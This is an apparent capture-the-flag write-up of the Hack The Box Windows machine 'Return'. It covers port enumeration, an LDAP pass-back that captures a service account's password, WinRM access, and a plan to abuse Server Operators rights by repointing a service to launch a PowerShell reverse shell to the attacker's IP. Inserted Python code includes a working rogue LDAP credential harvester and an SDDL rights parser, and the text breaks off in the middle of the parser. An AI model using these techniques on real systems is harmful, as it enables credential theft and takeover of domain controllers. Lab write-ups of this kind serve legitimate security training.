
Write-up Return on HTB

It has been a while since I last worked on an HTB machine, because things have been quite busy lately. Today I was a little more relaxed, so I could spend some time on HTB. I picked the Windows machine “Return”, which I had not done yet.

Getting started

After logging in to HTB I started the machine Return and soon had the IP address of my target on my screen. On Kali I opened a terminal and stored the target's IP address in a variable, so that I would have less typing to do later.

┌──(eMVee@kali)-[~]
└─$ ip=10.129.138.232  

With the IP address stored in a variable, I sent a ping to see whether my target was reachable.

┌──(eMVee@kali)-[~]
└─$ ping -c3 $ip
PING 10.129.138.232 (10.129.138.232) 56(84) bytes of data.
64 bytes from 10.129.138.232: icmp_seq=1 ttl=127 time=17.5 ms
64 bytes from 10.129.138.232: icmp_seq=2 ttl=127 time=16.7 ms
64 bytes from 10.129.138.232: icmp_seq=3 ttl=127 time=16.5 ms

--- 10.129.138.232 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 16.528/16.901/17.484/0.417 ms

The machine replied to my ping request, and the TTL value that came back is 127. A Windows host starts with a TTL of 128 and the single router hop between us decrements it by one, so this points to a Windows target (a Linux host typically starts at 64 and would show 63 here). The nmap scan below confirms this.

Enumeration is key

To find out which ports are open and which services are running, I ran the following nmap command: sudo nmap -sC -sV -T5 -p- -A -O $ip. Note that -T5 is the most aggressive timing template and can miss ports or produce unreliable version output on a lossy link; it was fine over the HTB VPN here, but -T4 is the safer default on real engagements.

┌──(eMVee@kali)-[~]
└─$ sudo nmap -sC -sV -T5 -p- -A -O $ip
[sudo] password for eMVee: 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-11 10:27 CET
Nmap scan report for 10.129.138.232
Host is up (0.017s latency).                                                                                                                         
Not shown: 65510 closed ports                                                                                                                         
PORT      STATE SERVICE       VERSION                                                                                                                     
53/tcp    open  domain        Simple DNS Plus                                                                                                             
80/tcp    open  http          Microsoft IIS httpd 10.0                                                                                                      
| http-methods:                                                                                                                                             
|_  Potentially risky methods: TRACE                                                                                                                          
|_http-server-header: Microsoft-IIS/10.0                                                                                                                      
|_http-title: HTB Printer Admin Panel                                                                                                                         
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-11 09:46:40Z)                                                                    
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                             
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                      
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)                                    
445/tcp   open  microsoft-ds?                                                                                                                                    
464/tcp   open  kpasswd5?                                                                                                                                        
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                
636/tcp   open  tcpwrapped                                                                                                                                 
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)                              
3269/tcp  open  tcpwrapped                                                                                                                                 
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                      
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                
|_http-title: Not Found                                                                                                                                    
9389/tcp  open  mc-nmf        .NET Message Framing                                                                                                         
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                      
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                
|_http-title: Not Found                                                                                                                                    
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows 2012|2016|7|2008|Vista|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_vista::sp1:home_premium cpe:/o:microsoft:windows_10:1511 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2016 (86%), Microsoft Windows 7 SP1 (86%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 (86%), Microsoft Windows Windows 7 SP1 (86%), Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 (86%), Microsoft Windows Vista SP1 (86%), Microsoft Windows Server 2012 Data Center (86%), Microsoft Windows 10 1511 (85%), Microsoft Windows 10 1709 - 1909 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-02-11T09:47:36
|_  start_date: N/A

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   16.92 ms 10.10.14.1
2   17.21 ms 10.129.138.232

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.12 seconds

From the nmap scan result I extract the data I think is important:

  • Windows, probably one of: Server 2012 R2, Server 2016, 7, Server 2008, Vista or 10 (the OS fingerprint is only a guess; the SMB banner later in this write-up pins it down)
  • Port 53
    • Simple DNS Plus
  • Port 80
    • Microsoft IIS httpd 10.0
    • HTB Printer Admin Panel
  • Port 88
    • Microsoft Windows Kerberos
  • Port 135, 139, 445
    • MSRPC, NetBIOS session service and SMB (message signing is enabled and required, so relaying SMB to this host is not an option)
  • Port 389 (and 636, 3268, 3269)
    • LDAP for the domain return.local; the Global Catalog ports 3268/3269 together with DNS and Kerberos mean this host is a Domain Controller
  • Other ports to come back to if these do not lead anywhere.

Let’s check the website on port 80 first before moving on to enumerating the other ports. The webpage title sounded interesting enough to start here.

┌──(eMVee@kali)-[~]
└─$ whatweb http://$ip      
http://10.129.138.232 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.129.138.232], 
Microsoft-IIS[10.0], PHP[7.4.13], Script, Title[HTB Printer Admin Panel], X-Powered-By[PHP/7.4.13]

Whatweb confirms what nmap found and adds the PHP version:

  • Microsoft IIS 10.0
  • PHP 7.4.13
  • Title: HTB Printer Admin Panel

Since I still did not know much, I decided to run Nikto against the target.

┌──(eMVee@kali)-[~]
└─$ nikto -h http://$ip
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.138.232
+ Target Hostname:    10.129.138.232
+ Target Port:        80
+ Start Time:         2022-02-11 10:32:06 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ Retrieved x-powered-by header: PHP/7.4.13
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-02-11 10:34:44 (GMT1) (158 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto found nothing new, so let's look at what the site shows in the browser.

The website can be inspected without any form of login and offers little functionality: a settings form with a server address field, and the page also states the port, 389. Before submitting the form, I switched FoxyProxy to the Burp Suite profile and started Burp Suite in the background.

By hitting the Update (submit) button I could inspect the POST request that is sent.

In the request I can see the hostname or IP address that is sent to the server. What happens if I change this to my own IP address and start a listener on the port stated on the page? Port 389 is LDAP, so the application will presumably try to authenticate against whatever "LDAP server" it is pointed at, and pointing it at a host I control is the classic pass-back attack against printer admin panels. In my terminal I started a netcat listener on port 389.

┌──(eMVee@kali)-[~]
└─$ sudo nc -lvp 389     
listening on [any] 389 ...

While the listener is running in the background I change the hostname to my IP address and send the POST request to the server.

┌──(eMVee@kali)-[~]
└─$ sudo nc -lvp 389       
listening on [any] 389 ...
10.129.138.232: inverse host lookup failed: Unknown host
connect to [10.10.14.26] from (UNKNOWN) [10.129.138.232] 50928
0*`%return\svc-printer�
                       1edFg43012!!

Within the netcat listener the raw LDAP BindRequest arrives. A simple bind carries the DN and the password in plaintext inside the BER-encoded message, so a username and password can be read straight from the dump:

  • svc-printer
  • 1edFg43012!!
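
The raw nc dump works, but it leaves you squinting at BER bytes and the printer panel hanging on a socket that never answers. As an added example (this is my code, not part of the original post), the Python listener below does the same job properly: it decodes the LDAPv3 simple BindRequest (RFC 4511, section 4.2), prints the DN and password as clean strings, and replies with a bindResponse(success) so the client closes cleanly. CAPTURED_BIND rebuilds the exact message shown in the nc output above from the visible bytes; the messageID of 1 is an assumption, since nc rendered it as an unprintable byte. Function names and the high-port fallback are mine.

```python
#!/usr/bin/env python3
"""Rogue LDAP listener that decodes simple BindRequests (RFC 4511, 4.2).

Added example for this write-up, not code from the original post. Replaces the
`nc -lvp 389` dump with a BER decoder so the DN and password come out as clean
strings, and answers bindResponse(success) so the client does not hang.
Only LDAPv3 simple binds are decoded; SASL binds are flagged, not decoded.
"""
import socket
import sys

TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_ENUMERATED = 0x0A
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0] constructed
TAG_BIND_RESPONSE = 0x61  # [APPLICATION 1] constructed
TAG_AUTH_SIMPLE = 0x80    # AuthenticationChoice: simple [0] OCTET STRING
TAG_AUTH_SASL = 0xA3      # AuthenticationChoice: sasl [3] SaslCredentials

# The bind the printer panel sent in this write-up, rebuilt from the bytes nc printed
# ('0', '*', '`', '%' are the tag/length bytes). messageID 1 is an assumption.
CAPTURED_BIND = (
    b"\x30\x2a" b"\x02\x01\x01"           # LDAPMessage(42) { messageID 1,
    b"\x60\x25" b"\x02\x01\x03"           #   BindRequest(37) { version 3,
    b"\x04\x12" b"return\\svc-printer"    #     name (LDAPDN, 18 bytes),
    b"\x80\x0c" b"1edFg43012!!"           #     simple password (12 bytes) } }
)


def read_tlv(buf: bytes, pos: int):
    """Decode one BER element at buf[pos]; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits = number of length octets
        n = length & 0x7F
        if not 0 < n <= 4:
            raise ValueError("unsupported BER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


def encode_tlv(tag: int, value: bytes) -> bytes:
    """BER-encode tag, definite length (short or long form) and value."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + value


def parse_bind_request(data: bytes) -> dict:
    """Return messageID, version, name and simple password of an LDAP BindRequest."""
    tag, msg, _ = read_tlv(data, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, raw_id, pos = read_tlv(msg, 0)
    tag_op, bind, _ = read_tlv(msg, pos)
    if tag != TAG_INTEGER or tag_op != TAG_BIND_REQUEST:
        raise ValueError("not a BindRequest")
    tag_v, raw_ver, pos = read_tlv(bind, 0)
    tag_n, raw_dn, pos = read_tlv(bind, pos)
    tag_a, raw_auth, _ = read_tlv(bind, pos)
    if tag_v != TAG_INTEGER or tag_n != TAG_OCTET_STRING:
        raise ValueError("malformed BindRequest")
    if tag_a == TAG_AUTH_SIMPLE:
        password = raw_auth.decode("utf-8", "replace")  # plaintext on the wire
    elif tag_a == TAG_AUTH_SASL:
        password = None                                 # SASL: nothing to harvest here
    else:
        raise ValueError("unknown AuthenticationChoice")
    return {"message_id": int.from_bytes(raw_id, "big", signed=True),
            "version": int.from_bytes(raw_ver, "big"),
            "name": raw_dn.decode("utf-8", "replace"),
            "password": password}


def build_bind_response(message_id: int, result_code: int = 0) -> bytes:
    """BindResponse { resultCode, matchedDN "", diagnosticMessage "" } for message_id."""
    body = (encode_tlv(TAG_ENUMERATED, bytes([result_code]))
            + encode_tlv(TAG_OCTET_STRING, b"")
            + encode_tlv(TAG_OCTET_STRING, b""))
    msg_id = message_id.to_bytes(message_id.bit_length() // 8 + 1, "big", signed=True)
    return encode_tlv(TAG_SEQUENCE,
                      encode_tlv(TAG_INTEGER, msg_id) + encode_tlv(TAG_BIND_RESPONSE, body))


def serve(host: str = "0.0.0.0", port: int = 389) -> dict:
    """Accept one connection, decode its bind, answer success, return the credentials."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            req = parse_bind_request(conn.recv(4096))
            print(f"[+] {peer[0]} bound as {req['name']!r} with password {req['password']!r}")
            conn.sendall(build_bind_response(req["message_id"]))
            return req


if __name__ == "__main__":
    # Port 389 needs root: `sudo python3 rogue_ldap.py`, or pass a high port as argv[1].
    serve(port=int(sys.argv[1]) if len(sys.argv) > 1 else 389)
```

Point the printer panel at your IP as before; the script prints the decoded credentials and exits after one bind. Because the target only ever sends a simple bind to the address in that form, there is no need to speak any more of the protocol than this.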

I can probably do more with these credentials. First, let's see what enum4linux finds when it knows the username svc-printer.

┌──(eMVee@kali)-[~]
└─$ enum4linux -k svc-printer $ip
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Feb 11 11:21:27 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.129.138.232
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. svc-printer


 ====================================================== 
|    Enumerating Workgroup/Domain on 10.129.138.232    |
 ====================================================== 
[E] Can't find workgroup/domain


 ======================================= 
|    Session Check on 10.129.138.232    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.129.138.232 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 ============================================= 
|    Getting domain SID for 10.129.138.232    |
 ============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: RETURN
Domain Sid: S-1-5-21-3750359090-2939318659-876128439
[+] Host is part of a domain (not a workgroup)
enum4linux complete on Fri Feb 11 11:21:37 2022

Well, that was a bit disappointing, although not surprising: the -k option only adds svc-printer to the list of known usernames, the session itself was still anonymous (note Username '' in the output), and I had already seen from the nmap scan that the machine is a domain member. Perhaps SMB would give more with the actual credentials, so I tried crackmapexec. The command I used looked like this: crackmapexec smb $ip -u svc-printer -p '1edFg43012!!'

┌──(eMVee@kali)-[~]
└─$ crackmapexec smb $ip -u svc-printer -p '1edFg43012!!'
SMB         10.129.138.232  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.129.138.232  445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 

The [+] confirms the credentials are valid on the domain return.local and the banner gives the OS as Windows 10.0 build 17763. Note that crackmapexec did not print (Pwn3d!) after the credentials, so svc-printer is a valid domain user but not a local administrator over SMB. WinRM listens by default on port 5985 (HTTP) or 5986 (HTTPS), and since I saw 5985 open in the first nmap scan, I wanted to verify that it really is WinRM and not just another HTTP.sys listener.

┌──(eMVee@kali)-[~]
└─$ sudo nmap $ip -Pn -sV -v --script=~/winrm.nse -p 5985
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-11 11:25 CET
NSE: Loaded 46 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:25
Completed Parallel DNS resolution of 1 host. at 11:25, 0.01s elapsed
Initiating SYN Stealth Scan at 11:25
Scanning 10.129.139.66 [1 port]
Discovered open port 5985/tcp on 10.129.139.66
Completed SYN Stealth Scan at 11:25, 0.33s elapsed (1 total ports)
Initiating Service scan at 11:25
Scanning 1 service on 10.129.139.66
Completed Service scan at 11:25, 6.05s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.139.66.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.15s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.08s elapsed
Nmap scan report for 10.129.139.66
Host is up (0.019s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_winrm: WinRM service detected
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.24 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

As expected, WinRM is running and we may be able to create a connection to the machine.

Getting initial foothold

With evil-winrm we can set up an interactive shell with the svc-printer user.

┌──(eMVee@kali)-[~]
└─$ evil-winrm -i $ip -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> 

We managed to connect to the machine with evil-winrm. Now that a connection has been made, it is time to see what information can be used. First I want to know which user I am on the machine and what permissions that user has.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> 

What immediately strikes me is that this account holds far more privileges than a service account should: it is a member of Server Operators and Print Operators, and it has SeBackupPrivilege, SeRestorePrivilege and SeLoadDriverPrivilege, each of which is a known route to privilege escalation on its own. Before digging into those I wanted the user flag, which is normally on the user's desktop, so let's start there.

*Evil-WinRM* PS C:\Users\svc-printer> cd ..
*Evil-WinRM* PS C:\Users\svc-printer> dir


    Directory: C:\Users\svc-printer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/26/2021   2:05 AM                Desktop
d-r---        5/26/2021   1:51 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir


    Directory: C:\Users\svc-printer\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/11/2022   1:44 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
<---- FLAG ---->

Now the user flag has been captured, it is time to enumerate a bit more. Let’s check the hostname and IP configuration.

*Evil-WinRM* PS C:\windows> hostname
printer
*Evil-WinRM* PS C:\windows> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::202
   IPv6 Address. . . . . . . . . . . : dead:beef::68b4:9ce:9b4e:bf5
   Link-local IPv6 Address . . . . . : fe80::68b4:9ce:9b4e:bf5%10
   IPv4 Address. . . . . . . . . . . : 10.129.138.232
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%10
                                       10.129.0.1

As expected, this machine has a single IP address, so there is nothing to pivot to for now. Next, let's look at the group memberships of svc-printer.

*Evil-WinRM* PS C:\windows> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

So the user has a few group memberships, which I will check in a moment. Let's first enumerate the users with net user to see who else is present. On a domain controller net user lists the domain accounts, and the krbtgt account in the output confirms that this is indeed a DC.

*Evil-WinRM* PS C:\windows> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
svc-printer
The command completed with one or more errors.

Since there are not many users, I checked the svc-printer account in more detail with net user svc-printer.

*Evil-WinRM* PS C:\windows> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

The svc-printer user is a member of the following local groups:

  • Print Operators
  • Remote Management Users (the name is truncated in the net user output above)
  • Server Operators

Server Operators is a built-in group that only exists on domain controllers, and according to hacktricks its members hold a number of rights there by default: they can log on to the DC, back up and restore files (the SeBackupPrivilege and SeRestorePrivilege in the whoami output), and start, stop and reconfigure services. That last one is what makes a service account in this group interesting to an attacker: if I can change the binary path of a service that runs as LocalSystem and then start it, whatever I put in that path runs as SYSTEM.

The plan is to use the PowerShell TCP reverse shell from Nishang and have a service launch it. I copied the script to my working directory and edited it with Visual Studio Code to append a line that invokes the reverse shell as soon as the script is loaded.

┌──(eMVee@kali)-[~/Documents/usefull]
└─$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
                                                                                                                    
┌──(eMVee@kali)-[~/Documents/usefull]
└─$ code shell.ps1                                                 

I added the following line to the end of the file: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 1234.

Privilege escalation

Since svc-printer is a Server Operator, I can use sc.exe to change the configuration of existing services. sc.exe talks to the Service Control Manager, and according to Microsoft its config subcommand rewrites the service's registry entries and the SCM database. Rather than creating a new service, I repoint an existing one that runs as LocalSystem, VSS (Volume Shadow Copy), so that its binPath runs my PowerShell download cradle. When the service starts, the cradle runs as NT AUTHORITY\SYSTEM. The downside is that VSS is broken until the original path is restored, so on a real engagement note the current BINARY_PATH_NAME first (sc.exe qc vss) in order to put it back afterwards.
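
Before relying on the group membership, it is worth checking the service's own ACL: the config/start chain only works if the trustee holds SERVICE_CHANGE_CONFIG (SDDL code DC) and SERVICE_START (RP) on that particular service. As an added example (my code, not part of the original post), the script below parses the SDDL string that sc.exe sdshow vss prints in the evil-winrm shell and reports, per trustee, whether that pair of rights is present. SAMPLE_SDDL is constructed for illustration and is not the descriptor from the box; the right and trustee abbreviations are the standard SDDL ones as interpreted for service objects.

```python
#!/usr/bin/env python3
"""Which trustees may reconfigure AND start a service? Parse `sc.exe sdshow <svc>` output.

Added example for this write-up, not code from the original post. Paste the SDDL
that sc.exe sdshow prints (or pipe it in) and each DACL ACE is decoded into service
rights; a trustee holding SERVICE_CHANGE_CONFIG (DC) and SERVICE_START (RP) can
repoint binPath and trigger it, which is the sc.exe config / sc.exe start chain.
SAMPLE_SDDL is constructed for illustration, not the descriptor from the box.
"""
import re
import sys

# SDDL right codes as interpreted for service objects: (name, access mask bit).
SERVICE_RIGHTS = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x00001), "DC": ("SERVICE_CHANGE_CONFIG", 0x00002),
    "LC": ("SERVICE_QUERY_STATUS", 0x00004), "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x00008),
    "RP": ("SERVICE_START", 0x00010), "WP": ("SERVICE_STOP", 0x00020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x00040), "LO": ("SERVICE_INTERROGATE", 0x00080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x00100),
    "SD": ("DELETE", 0x10000), "RC": ("READ_CONTROL", 0x20000),
    "WD": ("WRITE_DAC", 0x40000), "WO": ("WRITE_OWNER", 0x80000),
    "GA": ("GENERIC_ALL", 0x10000000),
}
# Well-known trustee abbreviations SDDL uses instead of full SIDs.
TRUSTEES = {"SY": "LocalSystem", "BA": "Administrators", "SO": "Server Operators",
            "PO": "Print Operators", "IU": "Interactive", "SU": "Service",
            "AU": "Authenticated Users", "BU": "Users", "WD": "Everyone"}

# ACE layout: (type;flags;rights;object_guid;inherit_object_guid;sid); the GUIDs are empty
# for services, hence the ';;;' between rights and trustee.
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[A-Za-z0-9]*);;;(?P<sid>[A-Z0-9-]+)\)")

# Constructed sample: LocalSystem can start/stop but not reconfigure; BA and SO get DC.
SAMPLE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)"
    "(A;;CCLCSWLOCRRC;;;SU)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)


def decode_rights(rights: str) -> set:
    """Map an SDDL rights field ("CCDC..." or a hex mask like "0x12") to right names."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for name, bit in SERVICE_RIGHTS.values() if mask & bit}
    names = set()
    for i in range(0, len(rights), 2):
        code = rights[i:i + 2]
        if code not in SERVICE_RIGHTS:
            raise ValueError(f"unknown SDDL right {code!r}")
        names.add(SERVICE_RIGHTS[code][0])
    return names


def parse_dacl(sddl: str) -> list:
    """Return [(ace_type, trustee, {rights})] for the D: part; the S: (audit) part is dropped."""
    dacl = sddl.split("S:", 1)[0]
    return [(m["type"], m["sid"], decode_rights(m["rights"])) for m in ACE_RE.finditer(dacl)]


def effective_rights(sddl: str, trustee: str) -> set:
    """Allow minus Deny for one trustee (abbreviation or SID). Group nesting is not resolved."""
    allowed, denied = set(), set()
    everything = {name for name, _ in SERVICE_RIGHTS.values()} - {"GENERIC_ALL"}
    for ace_type, sid, rights in parse_dacl(sddl):
        if sid != trustee:
            continue
        if "GENERIC_ALL" in rights:
            rights = everything
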